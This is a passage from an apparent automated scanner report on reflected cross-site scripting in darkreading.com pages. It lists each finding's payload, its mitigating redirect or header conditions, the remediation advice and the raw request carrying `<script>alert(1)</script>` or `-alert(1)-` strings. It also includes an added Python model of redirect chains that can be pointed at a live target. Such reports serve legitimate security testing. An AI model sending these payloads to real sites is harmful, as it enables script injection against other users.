Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /blog.asp HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e5040"-alert(1)-"a2516965a67
Connection: close
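The two redirect notes above (a redirect occurred before the echoing response, and the echoing response is itself a redirect), modelled as an added example that is not the scanner's code: walk a redirect chain the way a browser navigation does and report, per hop, whether the payload was reflected, whether that response is one the browser renders, and whether the payload travels on in the Location header. The response chains and the host app.example are constructed for the example.

```python
"""Added example, not the scanner's code: a model of the two redirect notes
above.  A payload may be echoed only after a redirect has been followed, or
only into the body of a 3xx response that the browser never renders.  The
response chains below are constructed and the host app.example is made up."""
from urllib.parse import urljoin

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_HOPS = 20  # browsers give up after a bounded number of redirects


def follow(start_url, fetch, payload, max_hops=MAX_HOPS):
    """Walk a redirect chain the way a browser navigation does.  fetch(url)
    returns (status, headers, body); here it is a lookup into constructed
    data, in practice it would be an HTTP client.  One dict per hop."""
    hops, url = [], start_url
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        location = headers.get('Location')
        is_redirect = status in REDIRECT_STATUSES and location is not None
        hops.append({
            'url': url,
            'status': status,
            'reflected': payload in body,
            # A 3xx body is discarded; only the final HTML response is rendered.
            'rendered': (not is_redirect
                         and headers.get('Content-Type', '').startswith('text/html')),
            # Payload in Location: it travels to the next hop with the browser.
            'carried_in_location': bool(location) and payload in location,
        })
        if not is_redirect:
            break
        url = urljoin(url, location)
    return hops


def verdict(hops):
    """Summarise the chain in the terms the report's notes use."""
    if any(h['reflected'] and h['rendered'] for h in hops):
        if len(hops) > 1:
            return 'rendered after redirect'   # exploitable once the redirect is followed
        return 'rendered'                      # exploitable directly
    if any(h['reflected'] for h in hops):
        return 'redirect body only'            # not rendered, likely not exploitable
    return 'not reflected'


PAYLOAD = '61502"><script>alert(1)</script>98765b900ea'
ATTACK_URL = 'http://app.example/blog.asp?%s=1' % PAYLOAD

# Case 1: the 302 echoes the parameter name into its own body; the 200 does not.
CHAIN_REDIRECT_BODY_ONLY = {
    ATTACK_URL: (302, {'Location': '/blog.asp?error=1', 'Content-Type': 'text/html'},
                 '<a href="/blog.asp?%s=1">Moved</a>' % PAYLOAD),
    'http://app.example/blog.asp?error=1': (200, {'Content-Type': 'text/html'},
                                            '<html><body>Error</body></html>'),
}
# Case 2: the 302 carries the payload in Location and the final 200 echoes it.
CHAIN_RENDERED_AFTER_REDIRECT = {
    ATTACK_URL: (302, {'Location': '/document.asp?%s=1' % PAYLOAD}, ''),
    'http://app.example/document.asp?%s=1' % PAYLOAD: (
        200, {'Content-Type': 'text/html'}, '<input name="%s=1">' % PAYLOAD),
}

if __name__ == '__main__':
    for name, chain in (('case 1', CHAIN_REDIRECT_BODY_ONLY),
                        ('case 2', CHAIN_RENDERED_AFTER_REDIRECT)):
        hops = follow(ATTACK_URL, chain.__getitem__, PAYLOAD)
        print(name, '->', verdict(hops), [(h['status'], h['reflected']) for h in hops])
```

To run it against a live target, pass an HTTP client in place of the dict lookup. A 'redirect body only' verdict is the situation the second note describes; the note's suggestion of interfering with the response headers amounts to turning that 3xx into a response the browser renders, which this model would then report as rendered.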
1.244. http://www.darkreading.com/blog.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61502"><script>alert(1)</script>98765b900ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog.asp?61502"><script>alert(1)</script>98765b900ea=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57eb1"-alert(1)-"67f8ee7bdce was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /document.asp HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57eb1"-alert(1)-"67f8ee7bdce
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff4b5"><script>alert(1)</script>fb54d3b4e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacksff4b5"><script>alert(1)</script>fb54d3b4e67/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc2ea"><script>alert(1)</script>586e15f22cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacks/showArticle.jhtmldc2ea"><script>alert(1)</script>586e15f22cd HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e747a"-alert(1)-"5609a7f9a91 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e747a"-alert(1)-"5609a7f9a91
Connection: close
1.249. http://www.darkreading.com/security/attacks/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/attacks/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab927"><script>alert(1)</script>dc410d64aa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/attacks/showArticle.jhtml?ab927"><script>alert(1)</script>dc410d64aa4=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84801"><script>alert(1)</script>a70b4586c38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities84801"><script>alert(1)</script>a70b4586c38/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c54"><script>alert(1)</script>f9546e78d9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities/showArticle.jhtmla8c54"><script>alert(1)</script>f9546e78d9c HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73d4b"-alert(1)-"af4361fc0be was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73d4b"-alert(1)-"af4361fc0be
Connection: close
1.253. http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/vulnerabilities/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf28"><script>alert(1)</script>22b4d1fe4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /security/vulnerabilities/showArticle.jhtml?5cf28"><script>alert(1)</script>22b4d1fe4b6=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close